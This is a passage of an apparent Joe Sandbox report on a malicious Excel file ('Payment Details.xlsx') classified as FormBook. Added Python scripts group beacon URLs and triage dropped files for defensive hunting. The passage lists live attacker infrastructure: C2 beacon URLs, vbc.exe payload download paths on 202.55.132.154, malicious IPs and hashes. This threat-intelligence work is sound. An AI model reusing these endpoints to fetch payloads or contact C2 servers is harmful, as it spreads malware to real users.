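    "www.facebookfrommeta.com/eg62/?bZ8x3p=OV0lMEyKFd8jUreu4bi0Rr4kVRCFjgRe9oHLF6Mu/RQip7pQWlFSy5baU8mChkjx4bva&9rmL=2dTD-rk0Sn",
    "https://www.example.com/abcd/?q=hello&page=2",       # constructed, benign
    "https://www.example.com/static/app.js?v=20211125",   # constructed, benign
]

CAMPAIGN_PATH = re.compile(r"^/([a-z0-9]{4})/$")
PARAM_NAME = re.compile(r"^[A-Za-z0-9-]+$")
BLOB_CHARS = re.compile(r"^[A-Za-z0-9+/=_-]+$")


def _split(url: str):
    """urlsplit() only finds the host when a scheme is present; the report
    lists several URLs without one."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url)


def campaign_path(url: str) -> Optional[str]:
    """Return the four-character directory (e.g. 'g2fg'), or None."""
    m = CAMPAIGN_PATH.match(_split(url).path)
    return m.group(1) if m else None


def looks_like_beacon(url: str, min_blob: int = 40) -> bool:
    """True when path and query match the shape described in the lead-in."""
    parts = _split(url)
    if not CAMPAIGN_PATH.match(parts.path) or not parts.query:
        return False
    # Split by hand: parse_qsl() would decode '+' and '%' inside the blob.
    pairs = [p.split("=", 1) for p in parts.query.split("&")]
    if len(pairs) != 2 or any(len(p) != 2 for p in pairs):
        return False
    if not all(PARAM_NAME.match(k) and BLOB_CHARS.match(v) for k, v in pairs):
        return False
    long_values = [v for _, v in pairs if len(v) >= min_blob]
    return len(long_values) == 1


def scan(urls: List[str]) -> List[Tuple[str, Optional[str], bool]]:
    """(url, campaign path, is_beacon) for each input URL."""
    return [(u, campaign_path(u), looks_like_beacon(u)) for u in urls]


def group_by_campaign(urls: List[str]) -> Dict[str, List[str]]:
    """Hosts grouped by campaign path. A bare path with no query (as in the
    extracted configuration) is kept; a four-character directory whose query
    does not have the beacon shape is dropped."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for u in urls:
        path = campaign_path(u)
        if path is None:
            continue
        if _split(u).query and not looks_like_beacon(u):
            continue
        groups[path].append(_split(u).hostname)
    return dict(groups)


if __name__ == "__main__":
    for url, path, beacon in scan(SAMPLE_URLS):
        print(f"{'BEACON ' if beacon else '       '}{path or '-':4}  {url}")
    print(group_by_campaign(SAMPLE_URLS))
```

A four-character directory plus one long opaque query value also describes some CDN and tracking URLs, so this is a pivoting aid for grouping and retro-hunting, not a blocking rule; the value it adds over a plain domain blocklist is that the path survives the domain rotation visible in the Context section.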

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | false | | high
          http://www.windows.com/pctv. | explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://java.sun.com | explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          http://investor.msn.com | explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.msnbc.com/news/ticker.txt | explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.icra.org/vocabulary/. | explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmp | false | | high
          http://wellformedweb.org/CommentAPI/ | explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmp | false | | high
          http://investor.msn.com/ | explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.iis.fhg.de/audioPA | explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.piriform.com/ccleaner | explorer.exe, 0000000A.00000000.493703831.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.487992474.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmp | false | | high
          http://computername/printers/printername/.printer | explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
          http://www.%s.comPA | vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
          http://www.autoitscript.com/autoit3 | explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | false | | high
          https://support.mozilla.org | explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | false | | high
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.hotmail.com/oe | explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://treyresearch.net | explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | false | | high
          http://servername/isapibackend.dll | schtasks.exe, 00000007.00000002.463015056.0000000001D80000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.493199905.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                    Contacted IPs

                                    Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          52.128.23.153 | www.metafirstclass.com | United States | 19324 | DOSARRESTUS | true
          202.55.132.154 | unknown | Viet Nam | 45540 | ADTEC-AS-VN ADTEC Media Joint Stock Company VN | true

          General Information

          Joe Sandbox Version: 34.0.0 Boulder Opal
          Analysis ID: 528790
          Start date: 25.11.2021
          Start time: 19:28:11
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 11m 5s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: Payment Details.xlsx
          Cookbook file name: defaultwindowsofficecookbook.jbs
          Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of new started processes analysed: 16
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.expl.evad.winXLSX@13/26@1/2
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 33.4% (good quality ratio 31%)
          • Quality average: 78.7%
          • Quality standard deviation: 29.4%
          HCA Information:
          • Successful, ratio: 89%
          • Number of executed functions: 95
          • Number of non-executed functions: 54
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .xlsx
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          • Excluded processes from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
          • Not all processes were analyzed; the report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

          Time | Type | Description
          19:28:37 | API Interceptor | 96x Sleep call for process: EQNEDT32.EXE modified
          19:28:41 | API Interceptor | 82x Sleep call for process: vbc.exe modified
          19:28:44 | API Interceptor | 10x Sleep call for process: powershell.exe modified
          19:28:45 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
          19:29:06 | API Interceptor | 229x Sleep call for process: rundll32.exe modified
          19:30:10 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    52.128.23.153ScanPIX.exeGet hashmaliciousBrowse
                                    • www.teslabotnews.com/b3n1/?6lP=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6DJWZpG9FVC6&3f0pfr=Kl08lv
                                    Sales Agreement 17-11-21.docGet hashmaliciousBrowse
                                    • www.primetimeexpress.com/unzn/?y484Hx=-ZBHbB&ADH05pfH=MJyeuj/2LKgxhmwBEaOepQoT7p7qWMZxszA12ONlFtrFds1veJHUTtJAiK7RWXKTq53B3g==
                                    WvXgppXywm.exe (malicious)
                                    • www.toylandmetaverse.com/fl9w/?5j=v1AeKWlaHX6Eq72DF41G94UNV/NYDSuRplsWHrwN6To9EelRczKlltUWTrACum/yoB9ljSCjWA==&h8U4C=6llpd2Bh-
                                    Payment Copy.exe (malicious)
                                    • www.teslabotnews.com/b3n1/?yT64XD=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6Al/ap6FM23sDVnWfA==&3fHX7=FRihe
                                    PaymentCopy.exe (malicious)
                                    • www.teslabotnews.com/b3n1/?3f2xVxJp=aUXk73yzMCo1/L4iXfPwqTXDL3lL/7gah35/YqDHpJTg3gHAjQWWkwmc6ApGWIWFbwr9&5jwDp=L6AxwpFhVl
                                    Order 2021-822.lzh (malicious)
                                    • www.facebookfrommeta.com/eg62/?bZ8x3p=OV0lMEyKFd8jUreu4bi0Rr4kVRCFjgRe9oHLF6Mu/RQip7pQWlFSy5baU8mChkjx4bva&9rmL=2dTD-rk0Sn
                                    Enquiry docs_001.xlsx (malicious)
                                    • www.seattleinsurancebrokers.com/ga6b/?5j=A0D4KLkh&f6AtFb8=oGgLDSe9xOlB5GlDtwDzpX4pln6O05SLUMzRMDF+wYBaw1FiV59KxrRNiVTogSR6a0FYWg==
                                    Ekol_LOG_00914,pdf.exe (malicious)
                                    • www.crushanxiety.com/dgt9/?bH=DN9ti628iJ60&j4=12y/kml0JY96G501vbo19U/0atRochhfLWLJv6r29D8zD012Da+Wo+tthAajWN1QtyKepmajXA==
                                    n14Gz5Qjcb.exe (malicious)
                                    • www.seniordatingtv.com/m0np/?j6782P=EZM4Hn6&9rjPn6YP=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOHojoIO06SWV
                                    Order778.exe (malicious)
                                    • www.thatswhatshesays.com/qtqq/?Blm8j=f/FZiUyvdsuqwIBAgZIX9WKLQRzMOkEyandyJXo4F5lwu5RDUoyQAcRbAjtv9ea26I2c&d2J41F=NR-H4
                                    RgproFrlyA.exe (malicious)
                                    • www.seniordatingtv.com/m0np/?UxlT9j=6lJxR8&ibh=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOEIznpeMk3/S
                                    Purchase Order.exe (malicious)
                                    • www.shanghaiinvestments.com/dbew/?0B=ZHEP+6Sbwud2o6WPXQGcD07+3wwAURWE880vqsTElQTjXjhbwYnDXrL09FYjjtKpss2J&F2Jl=pVbXcXHhznF
                                    ocJJiP3R3A.exe (malicious)
                                    • www.seniordatingtv.com/m0np/?1bvd-4=dUCYUXJGz1+sp6xvvc9snIlYomOfARD1rnKg4fXZI1ONuBe/oLzeroDKOEIZ4ZuMg13S&u0Dh=E2MDa2W
                                    GvrY83cA2d.exe (malicious)
                                    • www.inteleflow.com/bckt/?4hJDF=fxU5WiEsw2pXQ8uTQlBJiUCTUYmTeFKNjZblV7MbpGmpAyjjGOXWfttsCZUwbu6D8RjV&w48lT8=6loHNvhx9TdHUd0
                                    Quotation...exe (malicious)
                                    • www.safbox.com/qb4a/?s2MPPpM=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1qLWWV1UPmz7&iF=7n3dzFOPzb6dZjL
                                    purchase order_8019.exe (malicious)
                                    • www.safbox.com/qb4a/?TL3D=FrgLUJvHzHA4&V48DtRqP=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1prGZ0lsRDa8
                                    PURCHASE ORDER...exe (malicious)
                                    • www.safbox.com/qb4a/?kZAtl=3fNTnDv&Y2J=ZCS+L0Fp2y54cIX65U6QFvNdR6uyjNA1s+lcWgVaB/8dayUSZby/NV2n1qL8JlFULk77
                                    CTM_50,000.exe (malicious)
                                    • www.buyspygear.com/eca0/?fL08q=zY4pfOeDeO/4cMsab5ROCLy9IlZvLYQaYwu3Wi3iIrICY2pboEoqtMc4wIaZ15ginwXROy0c0Q==&m2=-ZVD
                                    gqdJ6f9axq.exe (malicious)
                                    • www.zwq.xyz/wufn/?f8TPbh=XjXBhjUXVwqHNoI6l7gvZZ0GeOD10IACqOaYHXXfcnXXr5FIeGn5Pi6ag2sKCKjwblNQsnhuYg==&mVEhB=4hPxHDz
                                    yAm5YrRQhy.exe (malicious)
                                    • www.telehood.com/ons5/?TfoP=H8HXnZyeypkxdZWjx93+goBuntysNdud/1pYfiy9imFYwHStf/ZC3J9TIxLN5tUW2H7n&8pFPh=EJBl8lT8vxY0u
                                    Match: 202.55.132.154
                                    Payment.xlsx (malicious)
                                    • 202.55.132.154/4267111111_2/vbc.exe
                                    RFQ.xlsx (malicious)
                                    • 202.55.132.154/76190111111_1/vbc.exe
                                    Quotation.xlsx (malicious)
                                    • 202.55.132.154/2290nw/vbc.exe
                                    Quote.xlsx (malicious)
                                    • 202.55.132.154/2290nw/vbc.exe
                                    Quotation123 19.11.21.xlsx (malicious)
                                    • 202.55.132.154/48680c/vbc.exe
                                    Shipping Document.xlsx (malicious)
                                    • 202.55.132.154/x386w/vbc.exe
                                    Quotation.xlsx (malicious)
                                    • 202.55.132.154/66w880/vbc.exe
                                    RFQ - R000001095.xlsx (malicious)
                                    • 202.55.132.154/w7h009/vbc.exe
                                    Quotation.xlsx (malicious)
                                    • 202.55.132.154/explorer10/vbc.exe
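The rows above are the sandbox's context table: every earlier sample that shares the matched IP, together with the URL it contacted. Two URL shapes recur, a single four-character directory with two query parameters on a throwaway domain (the beaconing the report's FormBook verdict refers to), and plain vbc.exe downloads from 202.55.132.154 under ever-changing directory names. The Python below is an added example, not part of the Joe Sandbox report: it parses rows written as "Sample (detection)" followed by "• URL" bullets, separates the two shapes, and groups the beacon URLs by host and directory so shared C2 paths stand out while the download URLs are collected for a blocklist. The input is constructed from the rows above with shortened query values, and the beacon heuristic is an assumption drawn from the shape of these rows, not a documented FormBook format.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed input: rows copied from the context table above, query values shortened.
SAMPLE_ROWS = """\
WvXgppXywm.exe (malicious)
• www.toylandmetaverse.com/fl9w/?5j=v1AeKWlaHX6Eq72DF41G94UNV&h8U4C=6llpd2Bh-
Payment Copy.exe (malicious)
• www.teslabotnews.com/b3n1/?yT64XD=aUXk73yzMCo1/L4iXfPwqTXDL3lL&3fHX7=FRihe
PaymentCopy.exe (malicious)
• www.teslabotnews.com/b3n1/?3f2xVxJp=aUXk73yzMCo1/L4iXfPwqTXDL3lL&5jwDp=L6AxwpFhVl
Payment.xlsx (malicious)
• 202.55.132.154/4267111111_2/vbc.exe
RFQ.xlsx (malicious)
• 202.55.132.154/76190111111_1/vbc.exe
Quote.xlsx (malicious)
• 202.55.132.154/2290nw/vbc.exe
"""

# Beacon shape seen in the rows above (assumption, not a documented format):
# a single four-character directory followed by exactly two query parameters.
BEACON_DIR = re.compile(r"^/[A-Za-z0-9]{4}/$")


def parse_context(text):
    """Yield (sample, url) pairs: a non-bullet line names the sample, each bullet after it is a URL it contacted."""
    sample = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            if sample is not None:
                yield sample, line.lstrip("• ").strip()
        else:
            sample = line.rsplit(" (", 1)[0]  # drop the "(detection)" suffix


def classify(url):
    """Return (kind, host, path): 'payload' for an EXE download, 'beacon' for the C2 shape, else 'other'."""
    parts = urlsplit("http://" + url)  # rows carry no scheme
    host, path = parts.hostname, parts.path
    if path.lower().endswith(".exe"):
        return "payload", host, path
    if BEACON_DIR.match(path) and len(parse_qsl(parts.query, keep_blank_values=True)) == 2:
        return "beacon", host, path
    return "other", host, path


def group_beacons(text):
    """Map host + directory -> sorted sample names, so a C2 path shared by several samples becomes visible."""
    groups = defaultdict(set)
    for sample, url in parse_context(text):
        kind, host, path = classify(url)
        if kind == "beacon":
            groups[host + path].add(sample)
    return {key: sorted(names) for key, names in groups.items()}


def payload_urls(text):
    """Sorted, de-duplicated download URLs (what you would push to a URL blocklist)."""
    return sorted({url for _, url in parse_context(text) if classify(url)[0] == "payload"})


if __name__ == "__main__":
    for key, names in group_beacons(SAMPLE_ROWS).items():
        print(f"{key}  <- {', '.join(names)}")
    print("payloads:", *payload_urls(SAMPLE_ROWS), sep="\n  ")
```

Grouping by host and directory rather than by full URL is the point: the query keys change on every request, so a full-URL indicator never matches twice, while www.teslabotnews.com/b3n1/ is the same C2 endpoint across both PaymentCopy samples.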

                                    Domains

                                    No context

                                    ASN

                                    Match / Associated Sample Name / Detection / Context
                                    Match: DOSARRESTUS
                                    ScanPIX.exe (malicious)
                                    • 52.128.23.153
                                    Sales Agreement 17-11-21.doc (malicious)
                                    • 52.128.23.153
                                    WvXgppXywm.exe (malicious)
                                    • 52.128.23.153
                                    Payment Copy.exe (malicious)
                                    • 52.128.23.153
                                    PaymentCopy.exe (malicious)
                                    • 52.128.23.153
                                    Order 2021-822.lzh (malicious)
                                    • 52.128.23.153
                                    Enquiry docs_001.xlsx (malicious)
                                    • 52.128.23.153
                                    Ekol_LOG_00914,pdf.exe (malicious)
                                    • 52.128.23.153
                                    n14Gz5Qjcb.exe (malicious)
                                    • 52.128.23.153
                                    Order778.exe (malicious)
                                    • 52.128.23.153
                                    RgproFrlyA.exe (malicious)
                                    • 52.128.23.153
                                    Purchase Order.exe (malicious)
                                    • 52.128.23.153
                                    ocJJiP3R3A.exe (malicious)
                                    • 52.128.23.153
                                    PO9887655.exe (malicious)
                                    • 52.128.23.27
                                    eVpu3gcOqT (malicious)
                                    • 70.33.253.205
                                    GvrY83cA2d.exe (malicious)
                                    • 52.128.23.153
                                    b3astmode.arm (malicious)
                                    • 69.172.202.200
                                    Quotation...exe (malicious)
                                    • 52.128.23.153
                                    purchase order_8019.exe (malicious)
                                    • 52.128.23.153
                                    PURCHASE ORDER...exe (malicious)
                                    • 52.128.23.153
                                    Match: ADTEC-AS-VNADTECMediaJointStockCompanyVN
                                    Payment.xlsx (malicious)
                                    • 202.55.132.154
                                    Product Offerety44663573.xlsx (malicious)
                                    • 202.55.133.101
                                    Offerta Ordine765746648.xlsx (malicious)
                                    • 202.55.133.101
                                    RFQ.xlsx (malicious)
                                    • 202.55.132.154
                                    Quotation.xlsx (malicious)
                                    • 202.55.132.154
                                    Quote.xlsx (malicious)
                                    • 202.55.132.154
                                    Quotation123 19.11.21.xlsx (malicious)
                                    • 202.55.132.154
                                    FA1bgAzG2b.exe (malicious)
                                    • 202.55.133.118
                                    fras comisiones.xlsx (malicious)
                                    • 202.55.133.118
                                    Shipping Document.xlsx (malicious)
                                    • 202.55.132.154
                                    WpCifE44PS.exe (malicious)
                                    • 202.55.133.118
                                    vPoecWLHxD.exe (malicious)
                                    • 202.55.133.118
                                    justificantes anticipos.xlsx (malicious)
                                    • 202.55.133.118
                                    RFQ _161121.xlsx (malicious)
                                    • 202.55.135.190
                                    Quotation.xlsx (malicious)
                                    • 202.55.132.154
                                    CTM REQ.xlsx (malicious)
                                    • 202.55.135.190
                                    MV OCEANLADY.docx (malicious)
                                    • 202.55.135.190
                                    invoice_34567445556.wbk (malicious)
                                    • 202.55.135.190
                                    PROFORMA INVOICE.xlsx (malicious)
                                    • 202.55.134.54
                                    RFQ - R000001095.xlsx (malicious)
                                    • 202.55.132.154

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:downloaded
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
                                    SHA-512:ADEFEE155A0579DA0DC75E4AFF162635338150A884DDDDF47C732A67D69E2F56471CDDD64A7CFFB743DEFC040185CE146B713C6511B3DAC709D4956E2D30EA31
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Reputation:low
                                    IE Cache URL:http://202.55.132.154/384500000_1/vbc.exe
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..a..............0.............~.... ... ....@.. .......................`............@.................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H........H...!..........\j...............................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
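The record above is the one that matters in this report: the Equation Editor process (EQNEDT32.EXE, the CVE-2017-11882 / CVE-2018-0802 target named in the signature list) wrote a 723 KB PE32 .NET assembly into the IE cache after fetching it from 202.55.132.154, and the file's 8-bit entropy of 7.76 is close to the 8.0 ceiling, which is what packed or encrypted content looks like. The Python below is an added example, not part of the Joe Sandbox report: it parses a dropped-file record in the report's "Key:Value" layout, recomputes the same entropy measure on raw bytes so the 7.76 figure is reproducible, and applies the triage rules an analyst would run over a whole dropped-files list (PE written by an Office component, fetched into the browser cache, high entropy, .NET assembly). The input is the record above with its hash and preview lines omitted, and the OFFICE_WRITERS set and the 7.0 entropy threshold are assumptions to tune for your own estate.

```python
import math
import ntpath
from collections import Counter

# Constructed input: the vbc[1].exe record above with its hash and preview lines omitted.
RECORD = """\
C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\ZAE7RW1P\\vbc[1].exe
Process:C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:downloaded
Size (bytes):723456
Entropy (8bit):7.763310640308659
Malicious:true
IE Cache URL:http://202.55.132.154/384500000_1/vbc.exe
"""

# Office components that have no business writing executables (assumption: extend for your estate).
OFFICE_WRITERS = {"EQNEDT32.EXE", "EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE"}
HIGH_ENTROPY = 7.0  # assumption: bits per byte above which a PE is treated as packed/encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the quantity the report's 'Entropy (8bit)' field reports; 8.0 is the maximum."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((count / n) * math.log2(count / n) for count in Counter(data).values())


def parse_record(text: str) -> dict:
    """First non-empty line is the dropped path; every later line is 'Key:Value', split on the first colon."""
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    record = {"Path": lines[0]}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        record[key] = value.strip()
    return record


def triage(record: dict) -> list:
    """Return the reasons this dropped file deserves analyst attention; an empty list means nothing was flagged."""
    reasons = []
    ftype = record.get("File Type", "")
    writer = ntpath.basename(record.get("Process", "")).upper()
    is_pe = ftype.startswith("PE32")  # covers both PE32 and PE32+
    if is_pe and writer in OFFICE_WRITERS:
        reasons.append(f"PE written by Office component {writer}")
    if record.get("Category") == "downloaded" or "Temporary Internet Files" in record["Path"]:
        reasons.append("fetched into the IE cache from " + record.get("IE Cache URL", "<no URL recorded>"))
    if is_pe and float(record.get("Entropy (8bit)", 0)) > HIGH_ENTROPY:
        reasons.append("high-entropy PE, likely packed or encrypted")
    if "Mono/.Net" in ftype:
        reasons.append(".NET assembly: expect an obfuscator or unpacker stage before the real payload")
    return reasons


if __name__ == "__main__":
    for reason in triage(parse_record(RECORD)):
        print("-", reason)
    # Entropy sanity check on synthetic data: uniform bytes hit the 8.0 ceiling, a constant buffer scores 0.
    print("uniform:", shannon_entropy(bytes(range(256))), "constant:", shannon_entropy(b"\x00" * 64))
```

Run against the PNG records that follow, the same rules stay quiet: EXCEL.EXE writing image data into Content.MSO is what embedding pictures in a workbook looks like, and their entropy is high only because PNG is already compressed, which is why the entropy rule is conditioned on the file being a PE.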
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23212CB0.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):68702
                                    Entropy (8bit):7.960564589117156
                                    Encrypted:false
                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B038AAB.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):42465
                                    Entropy (8bit):7.979580180885764
                                    Encrypted:false
                                    SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                    MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                    SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                    SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                    SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
